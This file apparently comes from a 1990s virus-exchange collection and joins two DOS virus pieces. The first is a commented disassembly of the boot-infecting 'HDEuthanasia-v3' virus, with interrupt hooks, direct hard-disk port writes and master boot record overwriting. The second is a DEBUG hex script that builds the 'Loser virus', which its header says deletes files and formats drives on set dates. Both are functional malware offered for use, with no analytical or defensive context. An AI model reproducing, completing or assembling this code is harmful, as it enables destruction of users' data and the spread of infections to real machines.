;
; Called from: 9804:18BC, 18D7, 1926, 1939
;==========================================================================
1908 sub_61 proc near
1908 push di
1909 mov di,word ptr cs:[18EEh] ; (9804:18EE=0)
190E mov al,byte ptr cs:[18F0h] ; (9804:18F0=2)
1912 cbw ; Convrt byte to word
1913 add di,ax
1915 mov ax,word ptr cs:[18F8h][di] ; (9804:18F8=1559h)
191A pop di
191B retn
sub_61 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:18B6
;==========================================================================
191C sub_62 proc near
191C push ax
191D push cx
191E mov ah,1
1920 call sub_60 ; (18F1)
1923 jz loc_225 ; Jump if zero
1925 xchg cx,ax
1926 call sub_61 ; (1908)
1929 cmp ax,cx
192B je loc_226 ; Jump if equal
192D push ds
192E xor ax,ax ; Zero register
1930 mov ds,ax
1932 mov ax,ds:data_19e ; (0000:041A=30h)
1935 mov ds:data_20e,ax ; (0000:041C=30h)
1938 pop ds
1939 loc_225: ; xref 9804:1923
1939 call sub_61 ; (1908)
193C mov cx,ax
193E mov ah,5
1940 int 16h ; Keyboard i/o ah=function 05h
; stuff key cx into keybd buffr
1942 loc_226: ; xref 9804:192B
1942 pop cx
1943 pop ax
1944 retn
sub_62 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:1400
;==========================================================================
1945 sub_63 proc near
PARAMETER_1 = 4 ; bp+4
PARAMETER_2 = 6 ; bp+6
PARAMETER_3 = 8 ; bp+8
PARAMETER_4 = 0Ah ; bp+0Ah
1945 push bp
1946 mov bp,sp
1948 mov data_62,0 ; (9804:0191=0)
194D mov data_53,71h ; (9804:0182=206h)
1953 mov data_55,0 ; (9804:0185=0)
1958 mov data_54,1 ; (9804:0184=0)
195D mov ax,3513h
1960 int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
1962 mov data_51,bx ; (9804:017E=61F7h)
1966 mov word ptr data_51+2,es ; (9804:0180=2099h)
196A call sub_2 ; (01F6)
196D cld ; Clear direction
196E , mov si,offset data_51 ; (9804:017E=0F7h)
1971 , mov di,1447h ; (9804:1447=97h)
1974 movsw ; Mov [si] to es:[di]
1975 movsw ; Mov [si] to es:[di]
1976 mov ax,440Dh
1979 mov bx,180h
197C mov cx,84Bh
197F int 21h ; DOS Services ah=function 44h
; IOctl-C block device control
; bl=drive, cx=category/type
; ds:dx ptr to parameter block
1981 mov ax,3516h
1984 int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
1986 mov word ptr ds:[18E9h],bx ; (9804:18E9=42Dh)
198A mov word ptr ds:[18EBh],es ; (9804:18EB=70h)
198E mov byte ptr ds:[18EDh],5 ; (9804:18ED=4)
1993 mov word ptr ds:[18EEh],0 ; (9804:18EE=0)
1999 , mov dx,offset int_16h_entry
199C mov ax,2516h
199F int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
19A1 push cs
19A2 pop es
19A3 mov bx,[bp+PARAMETER_3]
19A6 mov cx,[bp+PARAMETER_2]
19A9 mov dx,[bp+PARAMETER_1]
19AC loc_227: ; xref 9804:19C3
19AC mov ax,[bp+PARAMETER_4]
19AF call sub_59 ; (18A5)
19B2 jnc loc_228 ; Jump if carry=0
19B4 mov ax,word ptr ds:[18EEh] ; (9804:18EE=0)
19B7 add al,4
19B9 mov word ptr ds:[18EEh],ax ; (9804:18EE=0)
19BC mov byte ptr ds:[18F0h],0 ; (9804:18F0=2)
19C1 cmp al,0Ch
19C3 jbe loc_227 ; Jump if below or =
19C5 stc ; Set carry flag
19C6 loc_228: ; xref 9804:19B2
19C6 pushf ; Push flags
19C7 push ds
19C8 lds dx,dword ptr ds:[18E9h] ; (9804:18E9=42Dh) Load seg:offset ptr
19CC mov ax,2516h
19CF int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
19D1 pop ds
19D2 popf ; Pop flags
19D3 pop bp
19D4 retn 8
sub_63 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:1405, 16C6, 16EA
;==========================================================================
19D7 sub_64 proc near
19D7 call sub_67 ; (1A73)
19DA jc loc_230 ; Jump if carry Set
19DC jmp short loc_231 ; (19E8)
19DE loc_229: ; xref 9804:19F3
19DE pop es
19DF pop dx
19E0 pop cx
19E1 pop bx
19E2 pop ax
19E3 loc_230: ; xref 9804:19DA
19E3 call sub_59 ; (18A5)
19E6 jmp short loc_ret_234 ; (1A61)
19E8 loc_231: ; xref 9804:19DC
19E8 push ax
19E9 push bx
19EA push cx
19EB push dx
19EC push es
19ED mov di,4
19F0 loc_232: ; xref 9804:1A5A
19F0 mov si,bx
19F2 dec di
19F3 jz loc_229 ; Jump if zero
19F5 mov ah,0
19F7 mov dl,80h
19F9 int 13h ; Disk dl=drive 0 ah=func 00h
; reset disk, al=return status
19FB xor ax,ax ; Zero register
19FD mov es,ax
19FF mov es:data_22e,al ; (0000:048E=0)
1A03 cld ; Clear direction
1A04 mov dx,3F6h
1A07 mov al,4
1A09 out dx,al ; port 3F6h al = 4, reset controller
1A0A jmp short $+2 ; delay for I/O
1A0C jmp short $+2 ; delay for I/O
1A0E mov al,0
1A10 out dx,al ; port 3F6h al = 0, hdsk0 register
1A11 call sub_65 ; (1A62)
1A14 mov dx,1F2h
1A17 mov al,1
1A19 out dx,al ; port 1F2h, hdsk0-sector count
1A1A jmp short $+2 ; delay for I/O
1A1C jmp short $+2 ; delay for I/O
1A1E inc dx
1A1F mov al,1
1A21 out dx,al ; port 1F3h, hdsk0-sector numbr
1A22 jmp short $+2 ; delay for I/O
1A24 jmp short $+2 ; delay for I/O
1A26 inc dx
1A27 mov al,0
1A29 out dx,al ; port 1F4h, hdsk0-cylr,lo byte
1A2A jmp short $+2 ; delay for I/O
1A2C jmp short $+2 ; delay for I/O
1A2E inc dx
1A2F mov al,0
1A31 out dx,al ; port 1F5h, hdsk0-cylr,hi byte
1A32 jmp short $+2 ; delay for I/O
1A34 jmp short $+2 ; delay for I/O
1A36 inc dx
1A37 mov al,0A0h
1A39 out dx,al ; port 1F6h, hdsk0-siz/drv/head
1A3A jmp short $+2 ; delay for I/O
1A3C jmp short $+2 ; delay for I/O
1A3E inc dx
1A3F mov al,31h ; '1'
1A41 out dx,al ; port 1F7h, hdsk0-command reg
1A42 call sub_66 ; (1A6B)
1A45 mov cx,100h
1A48 mov dx,1F0h
1A4B db 0F3h, 6Fh
1A4D loc_233: ; xref 9804:1A53
1A4D mov al,es:data_22e ; (0000:048E=0)
1A51 or al,al ; Zero ?
1A53 jz loc_233 ; Jump if zero
1A55 call sub_65 ; (1A62)
1A58 test al,21h ; '!'
1A5A jnz loc_232 ; Jump if not zero
1A5C pop es
1A5D pop dx
1A5E pop cx
1A5F pop bx
1A60 pop ax
1A61 loc_ret_234: ; xref 9804:19E6
1A61 retn
sub_64 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:1A11, 1A55, 1A6B
;==========================================================================
1A62 sub_65 proc near
1A62 mov dx,1F7h
1A65 loc_235: ; xref 9804:1A68
1A65 in al,dx ; port 1F7h, hdsk0-status reg
1A66 test al,80h
1A68 jnz loc_235 ; Jump if not zero
1A6A retn
sub_65 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:1A42
;==========================================================================
1A6B sub_66 proc near
1A6B loc_236: ; xref 9804:1A70
1A6B call sub_65 ; (1A62)
1A6E test al,8
1A70 jz loc_236 ; Jump if zero
1A72 retn
sub_66 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:19D7
;==========================================================================
1A73 sub_67 proc near
1A73 push ax
1A74 push bx
1A75 mov ax,sp
1A77 push sp
1A78 pop bx
1A79 stc ; Set carry flag
1A7A pushf ; Push flags
1A7B cmp ax,bx
1A7D jne loc_237 ; Jump if not equal
1A7F mov al,12h
1A81 call sub_68 ; (1A96)
1A84 popf ; Pop flags
1A85 clc ; Clear carry flag
1A86 pushf ; Push flags
1A87 and ah,0F0h
1A8A cmp ah,10h
1A8D ja loc_237 ; Jump if above
1A8F popf ; Pop flags
1A90 stc ; Set carry flag
1A91 pushf ; Push flags
1A92 loc_237: ; xref 9804:1A7D, 1A8D
1A92 popf ; Pop flags
1A93 pop bx
1A94 pop ax
1A95 retn
sub_67 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:1A81
;==========================================================================
1A96 sub_68 proc near
1A96 push bx
1A97 mov bl,al
1A99 or al,80h
1A9B cli ; Disable interrupts
1A9C out 70h,al ; port 70h, CMOS addr,bit7=NMI
; al = 92h, hard disk type
1A9E jmp short $+2 ; delay for I/O
1AA0 jmp short $+2 ; delay for I/O
1AA2 in al,71h ; port 71h, CMOS data
1AA4 mov ah,al
1AA6 xor al,al ; Zero register
1AA8 jmp short $+2 ; delay for I/O
1AAA jmp short $+2 ; delay for I/O
1AAC out 70h,al ; port 70h, CMOS addr,bit7=NMI
; al = 0, seconds register
1AAE sti ; Enable interrupts
1AAF mov al,bl
1AB1 pop bx
1AB2 retn
sub_68 endp
1AB3 db 0, 0, 0, 0, 0
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:17E2, 189E
;==========================================================================
1AB8 sub_69 proc near
1AB8 push cs
1AB9 pop es
1ABA , mov di,1AB3h ; (9804:1AB3=0)
1ABD lds si,dword ptr es:[1447h] ; (9804:1447=2597h) Load seg:offset pt
1AC2 cld ; Clear direction
1AC3 movsw ; Mov [si] to es:[di]
1AC4 movsw ; Mov [si] to es:[di]
1AC5 movsb ; Mov [si] to es:[di]
1AC6 retn
sub_69 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:17E5, 1811, 18A1, 1B31, 1B8C, 1BF4, 1CFE
; 1D79
;==========================================================================
1AC7 sub_70 proc near
1AC7 push ds
1AC8 push si
1AC9 push ax
1ACA pushf ; Push flags
1ACB test byte ptr cs:[16CAh],2 ; (9804:16CA=2)
1AD1 jnz loc_238 ; Jump if not zero
1AD3 lds si,dword ptr cs:[1447h] ; (9804:1447=2597h) Load seg:offset pt
1AD8 mov byte ptr [si],0EAh
1ADB mov word ptr [si+1],1B37h
1AE0 mov [si+3],cs
1AE3 loc_238: ; xref 9804:1AD1
1AE3 popf ; Pop flags
1AE4 pop ax
1AE5 pop si
1AE6 pop ds
1AE7 retn
sub_70 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:04E7, 1808, 1B44
;==========================================================================
1AE8 sub_71 proc near
1AE8 pushf ; Push flags
1AE9 push cx
1AEA push di
1AEB push si
1AEC push ds
1AED push es
1AEE push cs
1AEF pop ds
1AF0 test byte ptr ds:[16CAh],2 ; (9804:16CA=2)
1AF5 jnz loc_239 ; Jump if not zero
1AF7 cli ; Disable interrupts
1AF8 , mov si,1AB3h ; (9804:1AB3=0)
1AFB les di,dword ptr ds:[1447h] ; (9804:1447=2597h) Load seg:offset pt
1AFF cld ; Clear direction
1B00 mov cx,5
1B03 rep movsb ; Rep when cx >0 Mov [si] to es:[di]
1B05 loc_239: ; xref 9804:1AF5
1B05 sti ; Enable interrupts
1B06 pop es
1B07 pop ds
1B08 pop si
1B09 pop di
1B0A pop cx
1B0B popf ; Pop flags
1B0C retn
sub_71 endp
1B0D db 0, 0
1B0F data_149 dw 0 ; xref 9804:1890
1B11 data_150 dw 3AFFh ; xref 9804:13C2, 1B7E
1B13 data_151 dw 0 ; xref 9804:170D, 179B
1B15 data_152 db 0 ; xref 9804:1C27
1B16 data_153 db 0 ; xref 9804:1B1A, 1B2A, 1C11, 1CA8
1B17 data_154 db 0 ; xref 9804:1D69, 1D74, 1D90, 1DCE
1B18 db 0
1B19 loc_240: ; xref 9804:1B6A
1B19 , popf ; Pop flags
1B1A mov cs:data_153,ah ; (9804:1B16=0)
1B1F call sub_59 ; (18A5)
1B22 pushf ; Push flags
1B23 or ah,ah ; Zero ?
1B25 jz loc_241 ; Jump if zero
1B27 jmp loc_253 ; (1BFD)
1B2A loc_241: ; xref 9804:1B25, 1CB0
1B2A mov cs:data_153,0 ; (9804:1B16=0)
1B30 popf ; Pop flags
1B31 call sub_70 ; (1AC7)
1B34 retf 2 ; Return far
1B37 pushf ; Push flags
1B38 cmp ax,5445h
1B3B jne loc_242 ; Jump if not equal
1B3D mov ax,4554h
1B40 popf ; Pop flags
1B41 retf 2 ; Return far
1B44 loc_242: ; xref 9804:1B3B
1B44 call sub_71 ; (1AE8)
1B47 cmp dx,80h
1B4B jne loc_243 ; Jump if not equal
1B4D cmp cx,1
1B50 jne loc_243 ; Jump if not equal
1B52 cmp ah,3
1B55 ja loc_243 ; Jump if above
1B57 cmp ah,2
1B5A jb loc_243 ; Jump if below
1B5C popf ; Pop flags
1B5D jmp short loc_247 ; (1B92)
1B5F nop
1B60 loc_243: ; xref 9804:1B4B, 1B50, 1B55, 1B5A
1B60 cmp dl,80h
1B63 jae loc_245 ; Jump if above or =
1B65 cmp ah,16h
1B68 jne loc_244 ; Jump if not equal
1B6A jmp short loc_240 ; (1B19)
1B6C loc_244: ; xref 9804:1B68
1B6C cmp ah,5
1B6F jae loc_245 ; Jump if above or =
1B71 cmp ah,1
1B74 jbe loc_245 ; Jump if below or =
1B76 jmp loc_253 ; (1BFD)
1B79 loc_245: ; xref 9804:1B63, 1B6F, 1B74
1B79 cmp dl,80h
1B7C jne loc_246 ; Jump if not equal
1B7E cmp cs:data_150,cx ; (9804:1B11=3AFFh)
1B83 jne loc_246 ; Jump if not equal
1B85 and ch,2
1B88 loc_246: ; xref 9804:1B7C, 1B83, 1CCF
1B88 , popf ; Pop flags
1B89 call sub_59 ; (18A5)
1B8C call sub_70 ; (1AC7)
1B8F retf 2 ; Return far
1B92 loc_247: ; xref 9804:1B5D
1B92 push bx
1B93 push cx
1B94 push dx
1B95 push es
1B96 cmp ah,2
1B99 je loc_248 ; Jump if equal
1B9B jmp short loc_249 ; (1BBB)
1B9D loc_248: ; xref 9804:1B99
1B9D call sub_59 ; (18A5)
1BA0 pushf ; Push flags
1BA1 push ax
1BA2 push bx
1BA3 mov ah,8
1BA5 mov dl,80h
1BA7 call sub_59 ; (18A5)
1BAA inc ch
1BAC dec dh
1BAE mov dl,80h
1BB0 mov ax,201h
1BB3 pop bx
1BB4 call sub_59 ; (18A5)
1BB7 pop ax
1BB8 popf ; Pop flags
1BB9 jmp short loc_251 ; (1BF0)
1BBB loc_249: ; xref 9804:1B9B
1BBB push ds
1BBC push di
1BBD push si
1BBE push ax
1BBF dec al
1BC1 push es
1BC2 push bx
1BC3 jz loc_250 ; Jump if zero
1BC5 add bx,200h
1BC9 inc cl
1BCB call sub_59 ; (18A5)
1BCE dec cl
1BD0 loc_250: ; xref 9804:1BC3
1BD0 mov ah,8
1BD2 mov dl,80h
1BD4 call sub_59 ; (18A5)
1BD7 pop bx
1BD8 pop es
1BD9 inc ch
1BDB dec dh
1BDD mov dl,80h
1BDF mov ax,301h
1BE2 call sub_53 ; (163C)
1BE5 call sub_59 ; (18A5)
1BE8 mov bx,ax
1BEA pop ax
1BEB mov al,bl
1BED pop si
1BEE pop di
1BEF pop ds
1BF0 loc_251: ; xref 9804:1BB9
1BF0 pop es
1BF1 pop dx
1BF2 pop cx
1BF3 pop bx
1BF4 call sub_70 ; (1AC7)
1BF7 retf 2 ; Return far
1BFA loc_252: ; xref 9804:1C1D, 1C43, 1C51
1BFA jmp loc_258 ; (1CA0)
1BFD loc_253: ; xref 9804:1B27, 1B76
1BFD push ax
1BFE push bx
1BFF push cx
1C00 push dx
1C01 push es
1C02 push ds
1C03 push si
1C04 push di
1C05 xor ax,ax ; Zero register
1C07 mov ds,ax
1C09 xor ch,ch ; Zero register
1C0B mov cl,dl
1C0D inc al
1C0F shl al,cl ; Shift w/zeros fill
1C11 cmp cs:data_153,0 ; (9804:1B16=0)
1C17 jne loc_254 ; Jump if not equal
1C19 test al,ds:data_21e ; (0000:043F=0)
1C1D jnz loc_252 ; Jump if not zero
1C1F loc_254: ; xref 9804:1C17
1C1F push cs
1C20 pop ds
1C21 push ds
1C22 pop es
1C23 mov cl,4
1C25 shl al,cl ; Shift w/zeros fill
1C27 mov data_152,al ; (9804:1B15=0)
1C2A mov si,3
1C2D loc_255: ; xref 9804:1C45
1C2D , xor ax,ax ; Zero register
1C2F call sub_59 ; (18A5)
1C32 mov ax,201h
1C35 mov cx,1
1C38 mov dh,ch
1C3A mov bx,1E6Ah
1C3D call sub_59 ; (18A5)
1C40 jnc loc_256 ; Jump if carry=0
1C42 dec si
1C43 jz loc_252 ; Jump if zero
1C45 jmp short loc_255 ; (1C2D)
1C47 loc_256: ; xref 9804:1C40
1C47 mov ax,ds:data_171e ; (9804:1F6C=0)
1C4A sub ax,ds:data_170e ; (9804:1F6A=0)
1C4E cmp ax,0CCFFh
1C51 je loc_252 ; Jump if equal
1C53 call sub_72 ; (1D80)
1C56 call sub_73 ; (1D8E)
1C59 jnc loc_257 ; Jump if carry=0
1C5B mov ax,401h
1C5E xor cx,cx ; Zero register
1C60 inc cx
1C61 mov dh,ch
1C63 call sub_59 ; (18A5)
1C66 jmp short loc_258 ; (1CA0)
1C68 loc_257: ; xref 9804:1C59
1C68 xor bx,bx ; Zero register
1C6A mov cl,1
1C6C mov ax,310h
1C6F call sub_59 ; (18A5)
1C72 jc loc_258 ; Jump if carry Set
1C74 mov bx,1E6Ah
1C77 mov cl,11h
1C79 mov ax,301h
1C7C call sub_59 ; (18A5)
1C7F jc loc_258 ; Jump if carry Set
1C81 mov bl,2
1C83 push dx
1C84 call sub_49 ; (1462)
1C87 pop dx
1C88 mov cx,1
1C8B xor dh,dh ; Zero register
1C8D mov bx,1E6Ah
1C90 mov byte ptr data_157,0EBh ; (9804:1E6A=98h)
1C95 mov byte ptr data_157+1,3Ch ; (9804:1E6B=0BCh) '<'
1C9A mov ax,301h
1C9D call sub_59 ; (18A5)
1CA0 loc_258: ; xref 9804:1BFA, 1C66, 1C72, 1C7F
1CA0 pop di
1CA1 pop si
1CA2 pop ds
1CA3 pop es
1CA4 pop dx
1CA5 pop cx
1CA6 pop bx
1CA7 pop ax
1CA8 cmp cs:data_153,0 ; (9804:1B16=0)
1CAE je loc_259 ; Jump if equal
1CB0 jmp loc_241 ; (1B2A)
1CB3 loc_259: ; xref 9804:1CAE
1CB3 cmp dh,0
1CB6 jne loc_260 ; Jump if not equal
1CB8 cmp cx,1
1CBB jne loc_260 ; Jump if not equal
1CBD test cs:data_59,4 ; (9804:018C=4)
1CC3 jnz loc_260 ; Jump if not zero
1CC5 cmp ah,2
1CC8 je loc_261 ; Jump if equal
1CCA cmp ah,3
1CCD je loc_263 ; Jump if equal
1CCF loc_260: ; xref 9804:1CB6, 1CBB, 1CC3
1CCF jmp loc_246 ; (1B88)
1CD2 loc_261: ; xref 9804:1CC8
1CD2 popf ; Pop flags
1CD3 call sub_59 ; (18A5)
1CD6 pushf ; Push flags
1CD7 push ax
1CD8 push bx
1CD9 push cx
1CDA push dx
1CDB push es
1CDC jc loc_262 ; Jump if carry Set
1CDE mov ax,word ptr es:[102h][bx] ; (9804:0102=0E800h)
1CE3 sub ax,word ptr es:[100h][bx] ; (9804:0100=860Eh)
1CE8 cmp ax,0CCFFh
1CEB jne loc_262 ; Jump if not equal
1CED mov ch,51h ; 'Q'
1CEF mov cl,11h
1CF1 mov dh,1
1CF3 mov ax,201h
1CF6 call sub_59 ; (18A5)
1CF9 loc_262: ; xref 9804:1CDC, 1CEB
1CF9 pop es
1CFA pop dx
1CFB pop cx
1CFC pop bx
1CFD pop ax
1CFE call sub_70 ; (1AC7)
1D01 popf ; Pop flags
1D02 retf 2 ; Return far
1D05 loc_263: ; xref 9804:1CCD
1D05 push ax
1D06 push bx
1D07 push es
1D08 push cs
1D09 pop es
1D0A mov ax,201h
1D0D mov bx,1E6Ah
1D10 call sub_59 ; (18A5)
1D13 pop es
1D14 pop bx
1D15 pop ax
1D16 push ax
1D17 dec al
1D19 jz loc_264 ; Jump if zero
1D1B add bx,200h
1D1F inc cl
1D21 call sub_59 ; (18A5)
1D24 sub bx,200h
1D28 dec cl
1D2A loc_264: ; xref 9804:1D19
1D2A push di
1D2B push si
1D2C push ds
1D2D push es
1D2E push bx
1D2F mov ax,word ptr es:[102h][di] ; (9804:0102=0E800h)
1D34 sub ax,word ptr es:[100h][di] ; (9804:0100=860Eh)
1D39 cmp ax,0CCFFh
1D3C jne loc_265 ; Jump if not equal
1D3E mov ch,51h ; 'Q'
1D40 mov cl,11h
1D42 mov dh,1
1D44 mov ax,301h
1D47 call sub_59 ; (18A5)
1D4A push es
1D4B pop ds
1D4C push cs
1D4D pop es
1D4E mov si,bx
1D50 add si,3
1D53 , mov di,offset data_159+1 ; (9804:1E6D=4Eh)
1D56 mov cx,3Bh
1D59 rep movsb ; Rep when cx >0 Mov [si] to es:[di]
1D5B mov bx,1E6Ah
1D5E loc_265: ; xref 9804:1D3C
1D5E mov dh,0
1D60 mov cx,1
1D63 mov ax,301h
1D66 call sub_59 ; (18A5)
1D69 mov cs:data_154,ah ; (9804:1B17=0)
1D6E pop bx
1D6F pop es
1D70 pop ds
1D71 pop si
1D72 pop di
1D73 pop ax
1D74 mov ah,cs:data_154 ; (9804:1B17=0)
1D79 call sub_70 ; (1AC7)
1D7C popf ; Pop flags
1D7D retf 2 ; Return far
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:1C53
;==========================================================================
1D80 sub_72 proc near
1D80 mov al,byte ptr ds:data_166e+1 ; (9804:1E7F=0)
1D83 cmp al,0FDh
1D85 je loc_266 ; Jump if equal
1D87 mov ch,51h ; 'Q'
1D89 jmp short loc_ret_267 ; (1D8D)
1D8B loc_266: ; xref 9804:1D85
1D8B mov ch,29h ; ')'
1D8D loc_ret_267: ; xref 9804:1D89
1D8D retn
sub_72 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:1C56
;==========================================================================
1D8E sub_73 proc near
1D8E mov dh,ch
1D90 mov data_154,dl ; (9804:1B17=0)
1D94 xor ax,ax ; Zero register
1D96 mov es,ax
1D98 les di,dword ptr es:data_8e ; (0000:0078=522h) Load seg:offset ptr
1D9D mov ax,es:[di+3]
1DA1 push ax
1DA2 mov byte ptr es:[di+3],2
1DA7 mov byte ptr es:[di+4],11h
1DAC push cs
1DAD pop es
1DAE , mov di,data_174e ; (9804:206A=0)
1DB1 cld ; Clear direction
1DB2 mov cx,11h
1DB5 mov dl,1
1DB7 locloop_268: ; xref 9804:1DC3
1DB7 mov ah,1
1DB9 mov al,dh
1DBB stosw ; Store ax to es:[di]
1DBC mov al,dl
1DBE mov ah,2
1DC0 stosw ; Store ax to es:[di]
1DC1 inc dl
1DC3 loop locloop_268 ; Loop if cx > 0
1DC5 mov ax,50Fh
1DC8 mov ch,dh
1DCA mov cl,1
1DCC mov dh,1
1DCE mov dl,data_154 ; (9804:1B17=0)
1DD2 mov bx,206Ah
1DD5 call sub_59 ; (18A5)
1DD8 pushf ; Push flags
1DD9 mov byte ptr ds:[1DFDh],ch ; (9804:1DFD=51h)
1DDD xor ax,ax ; Zero register
1DDF mov es,ax
1DE1 les di,dword ptr es:data_8e ; (0000:0078=522h) Load seg:offset ptr
1DE6 popf ; Pop flags
1DE7 pop ax
1DE8 mov es:[di+3],ax
1DEC push cs
1DED pop es
1DEE retn
sub_73 endp
1DEF loc_269: ; xref 9804:1E0B
1DEF mov bx,0B50h
1DF2 mov es,bx
1DF4 xor bx,bx ; Zero register
1DF6 mov ax,1E0Eh
1DF9 push es
1DFA push ax
1DFB mov cx,5101h
1DFE mov ax,411h
1E01 mov dx,100h
1E04 int 13h ; Disk dl=drive a ah=func 04h
; verify sectors with mem es:bx
; al=#,ch=cyl,cl=sectr,dh=head
1E06 mov ax,211h
1E09 int 13h ; Disk dl=drive a ah=func 02h
; read sectors to memory es:bx
; al=#,ch=cyl,cl=sectr,dh=head
1E0B jc loc_269 ; Jump if carry Set
1E0D retf ; Return far
1E0E sti ; Enable interrupts
1E0F xor ax,ax ; Zero register
1E11 mov es,ax
1E13 push cs
1E14 pop ds
1E15 cld ; Clear direction
1E16 , mov di,data_23e ; (0000:7C00=2)
1E19 , mov si,data_172e ; (9804:2000=0)
1E1C mov cx,200h
1E1F push es
1E20 push di
1E21 rep movsb ; Rep when cx >0 Mov [si] to es:[di]
1E23 mov data_59,al ; (9804:018C=4)
1E26 call sub_20 ; (08D0)
1E29 call sub_48 ; (1379)
1E2C retf ; Return far
1E2D data_156 db '"HDEuthanasia-v3" by Demon Emper' ; xref 9804:0265
1E4D db 'or: Hare Krsna, hare, hare...'
1E6A data_157 dw 0BC98h ; xref 9804:07B2, 1052, 16A3, 1C90
1E6C data_159 dw 4E2Dh ; xref 9804:0AE7, 0AEB, 0AF7, 1177
; 119A
1E6E data_161 dw 2417h ; xref 9804:0AF3, 0AFF, 117D
1E70 db 42h,0B3h
1E72 data_162 dw 0EB2Dh ; xref 9804:108A
1E74 db 01h, 45h,0BEh
seg_a ends
end start
____________________ CROSS REFERENCE - KEY ENTRY POINTS ___________________
seg:off type label
---- ---- ---- --------------------------------
9804:0000 far start
9804:01A2 far int_01h_entry
9804:18AC far int_16h_entry
__________________ Interrupt Usage Synopsis __________________
Interrupt 10h : Video display ah=functn xxh
Interrupt 10h : ah=00h set display mode in al
Interrupt 10h : ah=0Eh write char al, teletype mode
Interrupt 12h : Put (memory size)/1K in ax
Interrupt 13h : Disk dl=drive # ah=func xxh
Interrupt 13h : ah=00h reset disk, al=return status
Interrupt 13h : ah=02h read sectors to memory es:bx
Interrupt 13h : ah=03h write sectors from mem es:bx
Interrupt 13h : ah=04h verify sectors with mem es:bx
Interrupt 13h : ah=08h get drive parameters, bl=type
Interrupt 16h : Keyboard i/o ah=function xxh
Interrupt 16h : ah=05h stuff key cx into keybd buffr
Interrupt 1Ah : Real time clock ah=func xxh
Interrupt 1Ah : ah=04h get date cx=year, dx=mon/day
Interrupt 21h : DOS Services ah=function xxh
Interrupt 21h : ah=25h set intrpt vector al to ds:dx
Interrupt 21h : ah=35h get intrpt vector al in es:bx
Interrupt 21h : ax=440Dh IOctl-C block device control
Interrupt 21h : ah=52h get DOS data table ptr es:bx
Interrupt 21h : ah=62h get Program Segment Prefix bx
Interrupt 2Fh : DOS Internal services
9 Ocurrences of non-standard interrupts used (search for ??).
__________________ I/O Port Usage Synopsis __________________
Port 40h : 8253 timer 0 clock
Port 43h : 8253 timer control
Port 43h : al = 0, latch timer0 count
Port 70h : CMOS addr,bit7=NMI
Port 70h : al = 0, seconds register
Port 70h : al = 12h, hard disk type
Port 71h : CMOS data
Port 1F2h : hdsk0-sector count
Port 1F3h : hdsk0-sector numbr
Port 1F4h : hdsk0-cylr,lo byte
Port 1F5h : hdsk0-cylr,hi byte
Port 1F6h : hdsk0-siz/drv/head
Port 1F7h : hdsk0-status reg
Port 1F7h : hdsk0-command reg
Port 3F6h : al = 0, hdsk0 register
Port 3F6h : al = 4, reset controller
; - HARE.LST ------->>>> CUT HERE <<<<--------------------------------------
Loser virus
- title: Loser virus
- author: RickDogg
- date: 12-1-96
features: random deletion of files based upon user input. Also will format a:, b: and c: drive on specific dates. Message involved.
-member of alliance as well as vbb.
---------------DEBUG SCRIPT-----------------------------
N LOSER.COM
E 0100 FC BD 20 01 8B 6E 00 8B A6 02 00 8B 9E 04 00 B4
E 0110 4A CD 21 A1 2C 00 89 86 1A 00 8B 9E 00 00 FF E3
E 0120 0F 05 85 01 20 02 53 E8 00 00 5B 57 56 B4 FF AC
E 0130 0A C0 74 09 3C 25 74 13 AA FE CC 75 F2 32 C0 AA
E 0140 5E 5F B3 FF 2A DC 88 5D FF 5B C3 AC 49 3C 25 74
E 0150 E7 3C 7F 75 12 56 8B B6 0E 00 AC 3C 00 74 05 AA
E 0160 FE CC 75 F6 5E EB 0F 8A F0 80 EE 30 72 0E 80 FE
E 0170 09 77 09 FF 57 F8 0A E4 75 B5 EB C1 4E 41 FF 57
E 0180 FA EB F3 E5 01 53 E8 06 00 44 4F 53 32 58 00 5B
E 0190 51 56 1E BE 80 00 33 C9 8A 0C 46 3E 02 B6 1F 00
E 01A0 0A F6 75 2B 50 B4 30 CD 21 3C 02 58 77 04 8D 37
E 01B0 EB 22 06 57 8E 06 2C 00 32 C0 33 FF B9 00 80 F2
E 01C0 AE AE 75 FB AF 8B F7 5F 07 8E 1E 2C 00 EB 05 FF
E 01D0 57 FA 72 0A AC 3C 20 76 05 AA FE CC 75 F6 1F 5E
E 01E0 59 5B C3 05 02 53 E8 00 00 5B 32 D2 FF 57 FA 72
E 01F0 11 FE CE 7E 09 FE C2 FF 57 FA 72 04 EB EC 4E F8
E 0200 5B C3 F9 EB FB AC 3C 09 74 0C 3C 20 72 0E 74 06
E 0210 0A D2 75 F1 EB 04 0A D2 74 EB F8 C3 F9 C3 4C 02
E 0220 53 E8 00 00 5B 1E B9 FF 00 57 8B FE 8B D1 B0 25
E 0230 F2 AE 2B D1 4A 8B CF 5F 51 FF 57 FA 72 0A AC 0A
E 0240 C0 74 05 AA FE CC 75 F6 5E 1F 5B C3 53 51 57 06
E 0250 8E 86 1A 00 33 FF 8B DE 8B F3 8B CA F3 A6 74 14
E 0260 32 C0 B9 FF FF F2 AE 26 80 3D 00 75 EB 8B F7 06
E 0270 1F F9 EB 19 8B F7 06 1F AC 3C 3D 75 FB 80 3C 00
E 0280 74 EB AC 0A C0 72 04 3C 20 72 F7 4E F8 07 5F 59
E 0290 5B C3 8A 14 46 0A D2 74 06 B4 02 CD 21 EB F3 C3
E 02A0 C1 02 3C 03 53 E8 00 00 5B 8B FE 4F 8A 86 1E 00
E 02B0 1E 50 FF 57 FA 2E FF 57 F8 58 1F 88 86 1E 00 5B
E 02C0 C3 53 E8 20 00 00 44 55 4D 4D 59 20 20 20 46 43
E 02D0 42 00 00 00 00 00 44 55 4D 4D 59 20 20 20 46 43
